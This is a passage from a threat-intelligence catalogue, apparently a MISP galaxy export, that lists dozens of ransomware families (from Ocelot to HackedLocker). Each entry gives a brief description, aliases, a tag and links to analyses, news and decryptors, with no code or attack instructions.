Ocelot Ransomware (FAKE RANSOMWARE) is also known as:

  • Ocelot Locker Ransomware

Table 8024. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/ocelot-ransomware.html

https://twitter.com/malwrhunterteam/status/817648547231371264

SkyName Ransomware

It’s directed to Czechoslovakianspeaking users. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear

The tag is: misp-galaxy:ransomware="SkyName Ransomware"

SkyName Ransomware is also known as:

  • Blablabla Ransomware

Table 8025. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/skyname-ransomware.html

https://twitter.com/malwrhunterteam/status/817079028725190656

MafiaWare Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 155$ inbitcoins. Creator of ransomware is called Mafia. Based on HiddenTear

The tag is: misp-galaxy:ransomware="MafiaWare Ransomware"

MafiaWare Ransomware is also known as:

  • Depsex Ransomware

Table 8026. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/mafiaware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-6th-2017-fsociety-mongodb-pseudo-darkleech-and-more/

https://twitter.com/BleepinComputer/status/817069320937345024

Globe3 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 3 bitcoins. Extesion depends on the config file. It seems Globe is a ransomware kit.

The tag is: misp-galaxy:ransomware="Globe3 Ransomware"

Globe3 Ransomware is also known as:

  • Purge Ransomware

Globe3 Ransomware has relationships with:

  • similar: misp-galaxy:ransomware="Globe2 Ransomware" with estimative-language:likelihood-probability="likely"

Table 8027. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/globe3-ransomware.html

https://www.bleepingcomputer.com/forums/t/624518/globe-ransomware-help-and-support-purge-extension-how-to-restore-fileshta/

https://www.bleepingcomputer.com/news/security/the-globe-ransomware-wants-to-purge-your-files/

https://decryptors.blogspot.co.il/2017/01/globe3-decrypter.html

https://decrypter.emsisoft.com/globe3

BleedGreen Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 500$ in bitcoins. Requires .NET Framework 4.0. Gets into your startup system and sends you notes like the one below: https://4.bp.blogspot.com/-xrr6aoB_giw/WG1UrGpmZJI/AAAAAAAAC-Q/KtKdQP6iLY4LHaHgudF5dKs6i1JHQOBmgCLcB/s1600/green1.jpg

The tag is: misp-galaxy:ransomware="BleedGreen Ransomware"

BleedGreen Ransomware is also known as:

  • FireCrypt Ransomware

Table 8028. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/bleedgreen-ransomware.html

https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/

BTCamant Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Original name is Mission 1996 or Mission: “Impossible” (1996) (like the movie)

The tag is: misp-galaxy:ransomware="BTCamant Ransomware"

Table 8029. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/btcamant.html

X3M Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. It is also possible to break in using RDP Windows with the help of Pass-the-Hash system, PuTTY, mRemoteNG, TightVNC, Chrome Remote Desktop, modified version of TeamViewer, AnyDesk, AmmyyAdmin, LiteManager, Radmin and others. Ransom is 700$ in Bitcoins.

The tag is: misp-galaxy:ransomware="X3M Ransomware"

Table 8030. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/x3m-ransomware.html

GOG Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="GOG Ransomware"

Table 8031. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/gog-ransomware.html

https://twitter.com/BleepinComputer/status/816112218815266816

RegretLocker

RegretLocker is a new ransomware that has been found in the wild in the last month that does not only encrypt normal files on disk like other ransomwares. When running, it will particularly search for VHD files, mount them using Windows Virtual Storage API, and then encrypt all the files it finds inside of those VHD files.

The tag is: misp-galaxy:ransomware="RegretLocker"

Table 8032. Table References

Links

http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/

EdgeLocker

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 0.1 Bitcoins. Original name is TrojanRansom.

The tag is: misp-galaxy:ransomware="EdgeLocker"

Table 8033. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/edgelocker-ransomware.html

https://twitter.com/BleepinComputer/status/815392891338194945

Red Alert

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Fake name: Microsoft Corporation. Based on HiddenTear

The tag is: misp-galaxy:ransomware="Red Alert"

Red Alert has relationships with:

  • similar: misp-galaxy:malpedia="Red Alert" with estimative-language:likelihood-probability="likely"

Table 8034. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/red-alert-ransomware.html

https://twitter.com/JaromirHorejsi/status/815557601312329728

First

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="First"

Table 8035. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/first-ransomware.html

XCrypt Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Written on Delphi. The user requests the victim to get in touch with him through ICQ to get the ransom and return the files.

The tag is: misp-galaxy:ransomware="XCrypt Ransomware"

XCrypt Ransomware is also known as:

  • XCrypt

Table 8036. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/xcrypt-ransomware.html

https://twitter.com/JakubKroustek/status/825790584971472902

7Zipper Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="7Zipper Ransomware"

Table 8037. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/7zipper-ransomware.html

https://1.bp.blogspot.com/-ClM0LCPjQuk/WI-BgHTpdNI/AAAAAAAADc8/JyEQ8-pcJmsXIntuP-MMdE-pohVncxTXQCLcB/s1600/7-zip-logo.png

Zyka Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 170$ or EUR in Bitcoins.

The tag is: misp-galaxy:ransomware="Zyka Ransomware"

Table 8038. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/zyka-ransomware.html

https://www.pcrisk.com/removal-guides/10899-zyka-ransomware

https://download.bleepingcomputer.com/demonslay335/StupidDecrypter.zip

https://twitter.com/GrujaRS/status/826153382557712385

SureRansom Ransomeware (Fake)

It’s directed to English speaking users, therefore is able to strike worldwide. This ransomware does not really encrypt your files. Ransom requested is £50 using credit card.

The tag is: misp-galaxy:ransomware="SureRansom Ransomeware (Fake)"

Table 8039. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/sureransom-ransomware.html

http://www.forbes.com/sites/leemathews/2017/01/27/fake-ransomware-is-tricking-people-into-paying/#777faed0381c

Netflix Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware uses the known online library as a decoy. It poses as Netflix Code generator for Netflix login, but instead encrypts your files. The ransom is 100$ in Bitcoins.

The tag is: misp-galaxy:ransomware="Netflix Ransomware"

Table 8040. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/netflix-ransomware.html

http://blog.trendmicro.com/trendlabs-security-intelligence/netflix-scam-delivers-ransomware/

https://www.bleepingcomputer.com/news/security/rogue-netflix-app-spreads-netix-ransomware-that-targets-windows-7-and-10-users/

http://www.darkreading.com/attacks-breaches/netflix-scam-spreads-ransomware/d/d-id/1328012

https://4.bp.blogspot.com/-bQQ4DTIClvA/WJCIh6Uq2nI/AAAAAAAADfY/hB5HcjuGgh8rRJKeLHoIRz3Ezth22-wCEw/s1600/form1.jpg

https://4.bp.blogspot.com/-ZnWdPDprJOg/WJCPeCtP4HI/AAAAAAAADfw/kR0ifI1naSwTAwSuOPiw8ZCPr0tSIz1CgCLcB/s1600/netflix-akk.png

Merry Christmas

It’s directed to English and Italian speaking users, therefore is able to infect worldwide. Most attacks are on organizations and servers. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. They pose as a Consumer complaint notification that’s coming from Federal Trade Commission from USA, with an attached file called “complaint.pdf”. Written in Delphi by hacker MicrRP.

The tag is: misp-galaxy:ransomware="Merry Christmas"

Merry Christmas is also known as:

  • Merry X-Mas

  • MRCR

Table 8041. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/mrcr1-ransomware.html

https://www.bleepingcomputer.com/news/security/-merry-christmas-ransomware-now-steals-user-private-data-via-diamondfox-malware/

http://www.zdnet.com/article/not-such-a-merry-christmas-the-ransomware-that-also-steals-user-data/

https://www.bleepingcomputer.com/news/security/merry-christmas-ransomware-and-its-dev-comodosecurity-not-bringing-holiday-cheer/

https://decrypter.emsisoft.com/mrcr

Seoirse Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Seoirse is how in Ireland people say the name George. Ransom is 0.5 Bitcoins.

The tag is: misp-galaxy:ransomware="Seoirse Ransomware"

Table 8042. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/seoirse-ransomware.html

KillDisk Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Every file is encrypted with a personal AES-key, and then AES-key encrypts with a RSA-1028 key. Hacking by TeleBots (Sandworm). Goes under a fake name: Update center or Microsoft Update center.

The tag is: misp-galaxy:ransomware="KillDisk Ransomware"

Table 8043. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/killdisk-ransomware.html

https://www.bleepingcomputer.com/news/security/killdisk-ransomware-now-targets-linux-prevents-boot-up-has-faulty-encryption/

https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/

http://www.zdnet.com/article/247000-killdisk-ransomware-demands-a-fortune-forgets-to-unlock-files/

http://www.securityweek.com/destructive-killdisk-malware-turns-ransomware

http://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt/

https://cyberx-labs.com/en/blog/new-killdisk-malware-brings-ransomware-into-industrial-domain/

DeriaLock Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Maker is arizonacode and ransom amount is 20-30$. If the victim decides to pay the ransom, he will have to copy HWID and then speak to the hacker on Skype and forward him the payment.

The tag is: misp-galaxy:ransomware="DeriaLock Ransomware"

Table 8044. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/derialock-ransomware.html

https://www.bleepingcomputer.com/news/security/new-derialock-ransomware-active-on-christmas-includes-an-unlock-all-command/

BadEncript Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="BadEncript Ransomware"

Table 8045. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/badencript-ransomware.html

https://twitter.com/demonslay335/status/813064189719805952

AdamLocker Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The name of the creator is puff69.

The tag is: misp-galaxy:ransomware="AdamLocker Ransomware"

Table 8046. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/adamlocker-ransomware.html

Alphabet Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware poses as Windows 10 Critical Update Service. Offers you to update your Windows 10, but instead encrypts your files. For successful attack, the victim must have .NET Framework 4.5.2 installed on him computer.

The tag is: misp-galaxy:ransomware="Alphabet Ransomware"

Alphabet Ransomware has relationships with:

  • similar: misp-galaxy:malpedia="Alphabet Ransomware" with estimative-language:likelihood-probability="likely"

Table 8047. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/alphabet-ransomware.html

https://twitter.com/PolarToffee/status/812331918633172992

KoKoKrypt Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread by its creator in forums. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files and documents and more. The ransom is 0.1 bitcoins within 72 hours. Uses Windows Update as a decoy. Creator: Talnaci Alexandru

The tag is: misp-galaxy:ransomware="KoKoKrypt Ransomware"

KoKoKrypt Ransomware is also known as:

  • KokoLocker Ransomware

Table 8048. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/kokokrypt-ransomware.html

http://removevirusadware.com/tips-for-removeing-kokokrypt-ransomware/

L33TAF Locker Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 0.5 bitcoins. The name of the creator is staffttt, he also created Fake CryptoLocker

The tag is: misp-galaxy:ransomware="L33TAF Locker Ransomware"

Table 8049. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/l33taf-locker-ransomware.html

PClock4 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam (for example: “you have a criminal case against you”), fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="PClock4 Ransomware"

PClock4 Ransomware is also known as:

  • PClock SysGop Ransomware

Table 8050. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/pclock4-sysgop-ransomware.html

Guster Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware uses VBS-script to send a voice message as the first few lines of the note.

The tag is: misp-galaxy:ransomware="Guster Ransomware"

Table 8051. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/guster-ransomware.html

https://twitter.com/BleepinComputer/status/812131324979007492

Roga

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker requests the ransom in Play Store cards. https://3.bp.blogspot.com/-ClUef8T55f4/WGKb8U4GeaI/AAAAAAAACzg/UFD0X2sORHYTVRNBSoqd5q7TBrOblQHmgCLcB/s1600/site.png

The tag is: misp-galaxy:ransomware="Roga"

Roga has relationships with:

  • similar: misp-galaxy:ransomware="Free-Freedom" with estimative-language:likelihood-probability="likely"

Table 8052. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/roga-ransomware.html

CryptoLocker3 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Creator is staffttt and the ransom is 0.5 botcoins.

The tag is: misp-galaxy:ransomware="CryptoLocker3 Ransomware"

CryptoLocker3 Ransomware is also known as:

  • Fake CryptoLocker

Table 8053. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/cryptolocker3-ransomware.html

ProposalCrypt Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is 1.0 bitcoins.

The tag is: misp-galaxy:ransomware="ProposalCrypt Ransomware"

Table 8054. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/proposalcrypt-ransomware.html

http://www.archersecuritygroup.com/what-is-ransomware/

https://twitter.com/demonslay335/status/812002960083394560

https://twitter.com/malwrhunterteam/status/811613888705859586

Manifestus Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker demands 0.2 bitcoins. The ransomware poses as a Window update.

The tag is: misp-galaxy:ransomware="Manifestus Ransomware "

Table 8055. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/manifestus-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-23rd-2016-cryptxxx-koolova-cerber-and-more/

https://twitter.com/struppigel/status/811587154983981056

EnkripsiPC Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The name of the hacker is humanpuff69 and he requests 0.5 bitcoins. The encryption password is based on the computer name

The tag is: misp-galaxy:ransomware="EnkripsiPC Ransomware"

EnkripsiPC Ransomware is also known as:

  • IDRANSOMv3

  • Manifestus

EnkripsiPC Ransomware has relationships with:

  • similar: misp-galaxy:malpedia="Manifestus" with estimative-language:likelihood-probability="likely"

Table 8056. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/enkripsipc-ransomware.html

https://twitter.com/demonslay335/status/811343914712100872

https://twitter.com/BleepinComputer/status/811264254481494016

https://twitter.com/struppigel/status/811587154983981056

BrainCrypt Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. So far the victims are from Belarus and Germany.

The tag is: misp-galaxy:ransomware="BrainCrypt Ransomware"

Table 8057. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/braincrypt-ransomware.html

MSN CryptoLocker Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 0.2 bitcoins.

The tag is: misp-galaxy:ransomware="MSN CryptoLocker Ransomware"

Table 8058. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/msn-cryptolocker-ransomware.html

https://twitter.com/struppigel/status/810766686005719040

CryptoBlock Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is in the amount is 0.3 bitcoins. The ransomware is disguises themselves as Adobe Systems, Incorporated. RaaS

The tag is: misp-galaxy:ransomware="CryptoBlock Ransomware "

Table 8059. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/cryptoblock-ransomware.html

https://twitter.com/drProct0r/status/810500976415281154

AES-NI Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="AES-NI Ransomware "

Table 8060. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/aes-ni-ransomware.html

Koolova Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker of this ransomware tends to make lots of spelling errors in his requests. With Italian text that only targets the Test folder on the user’s desktop

The tag is: misp-galaxy:ransomware="Koolova Ransomware"

Table 8061. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/koolova-ransomware.html

https://www.bleepingcomputer.com/news/security/koolova-ransomware-decrypts-for-free-if-you-read-two-articles-about-ransomware/

Fake Globe Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… The ransom is 1bitcoin.

The tag is: misp-galaxy:ransomware="Fake Globe Ransomware"

Fake Globe Ransomware is also known as:

  • Globe Imposter

  • GlobeImposter

Fake Globe Ransomware has relationships with:

  • similar: misp-galaxy:malpedia="GlobeImposter" with estimative-language:likelihood-probability="likely"

Table 8062. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/fake-globe-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-30th-2016-infected-tvs-and-open-source-ransomware-sucks/

https://twitter.com/fwosar/status/812421183245287424

https://decrypter.emsisoft.com/globeimposter

https://twitter.com/malwrhunterteam/status/809795402421641216

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/

https://twitter.com/GrujaRS/status/1004661259906768896

V8Locker Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc…

The tag is: misp-galaxy:ransomware="V8Locker Ransomware"

Table 8063. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/v8locker-ransomware.html

Cryptorium (Fake Ransomware)

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It SUPPOSEDLY encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc., however your files are not really encrypted, only the names are changed.

The tag is: misp-galaxy:ransomware="Cryptorium (Fake Ransomware)"

Table 8064. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/cryptorium-ransomware.html

Antihacker2017 Ransomware

It’s directed to Russian speaking users, there fore is able to infect mosty the old USSR countries. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc … The hacker goes by the nickname Antihacker and requests the victim to send him an email for the decryption. He does not request any money only a warning about looking at porn (gay, incest and rape porn to be specific).

The tag is: misp-galaxy:ransomware="Antihacker2017 Ransomware"

Table 8065. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/antihacker2017-ransomware.html

CIA Special Agent 767 Ransomware (FAKE!!!)

It’s directed to English speaking users, therefore is able to infect users all over the world. It is spread using email spam, fake updates, attachments and so on. It SUPPOSEDLY encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… Your files are not really encrypted and nothing actually happens, however the hacker does ask the victim to pay a sum of 100$, after 5 days the sum goes up to 250$ and thereafter to 500$. After the payment is received, the victim gets the following message informing him that he has been fooled and he simply needed to delete the note. https://4.bp.blogspot.com/-T8iSbbGOz84/WFGZEbuRfCI/AAAAAAAACm0/SO8Srwx2UIM3FPZcZl7W76oSDCsnq2vfgCPcB/s1600/code2.jpg

The tag is: misp-galaxy:ransomware="CIA Special Agent 767 Ransomware (FAKE!!!)"

Table 8066. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/cia-special-agent-767-ransomware.html

https://www.bleepingcomputer.com/virus-removal/remove-cia-special-agent-767-screen-locker

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-16th-2016-samas-no-more-ransom-screen-lockers-and-more/

https://guides.yoosecurity.com/cia-special-agent-767-virus-locks-your-pc-screen-how-to-unlock/

LoveServer Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… This hacker request your IP address in return for the decryption.

The tag is: misp-galaxy:ransomware="LoveServer Ransomware "

Table 8067. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/loveserver-ransomware.html

Kraken Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… The hacker requests 2 bitcoins in return for the files.

The tag is: misp-galaxy:ransomware="Kraken Ransomware"

Table 8068. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/kraken-ransomware.html

Antix Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… The ransom is 0.25 bitcoins and the nickname of the hacker is FRC 2016.

The tag is: misp-galaxy:ransomware="Antix Ransomware"

Table 8069. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/antix-ransomware.html

PayDay Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… The ransom is R$950 which is due in 5 days. (R$ is a Brazilian currency) Based off of Hidden-Tear

The tag is: misp-galaxy:ransomware="PayDay Ransomware "

Table 8070. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/payday-ransomware.html

https://twitter.com/BleepinComputer/status/808316635094380544

Slimhem Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is NOT spread using email spam, fake updates, attachments and so on. It simply places a decrypt file on your computer.

The tag is: misp-galaxy:ransomware="Slimhem Ransomware"

Table 8071. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/slimhem-ransomware.html

M4N1F3STO Ransomware (FAKE!!!!!)

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… FILES DON’T REALLY GET DELETED NOR DO THEY GET ENCRYPTED!!!!!!!

The tag is: misp-galaxy:ransomware="M4N1F3STO Ransomware (FAKE!!!!!)"

Table 8072. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/m4n1f3sto-ransomware.html

Dale Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… CHIP > DALE

The tag is: misp-galaxy:ransomware="Dale Ransomware"

Dale Ransomware is also known as:

  • DaleLocker Ransomware

UltraLocker Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… Based on the idiotic open-source ransomware called CryptoWire

The tag is: misp-galaxy:ransomware="UltraLocker Ransomware"

Table 8073. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/ultralocker-ransomware.html

https://twitter.com/struppigel/status/807161652663742465

AES_KEY_GEN_ASSIST Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc…

The tag is: misp-galaxy:ransomware="AES_KEY_GEN_ASSIST Ransomware"

Table 8074. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/aeskeygenassist-ransomware.html

https://id-ransomware.blogspot.co.il/2016/09/dxxd-ransomware.html

https://www.bleepingcomputer.com/forums/t/634258/aes-key-gen-assistprotonmailcom-help-support/

Code Virus Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Code Virus Ransomware "

Table 8075. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/code-virus-ransomware.html

FLKR Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="FLKR Ransomware"

Table 8076. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/flkr-ransomware.html

PopCorn Time Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. These hackers claim to be students from Syria. This ransomware poses as the popular torrent movie screener called PopCorn. These criminals give you the chance to retrieve your files “for free” by spreading this virus to others. Like shown in the note bellow: https://www.bleepstatic.com/images/news/ransomware/p/Popcorn-time/refer-a-friend.png

The tag is: misp-galaxy:ransomware="PopCorn Time Ransomware"

Table 8077. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/popcorntime-ransomware.html

https://www.bleepingcomputer.com/news/security/new-scheme-spread-popcorn-time-ransomware-get-chance-of-free-decryption-key/

HackedLocker Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… NO POINT OF PAYING THE RANSOM—THE HACKER DOES NOT GIVE A DECRYPT AFTERWARDS.

The tag is: misp-galaxy:ransomware="HackedLocker Ransomware"

Table 8078. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/hackedlocker-ransomware.html

GoldenEye Ransomware

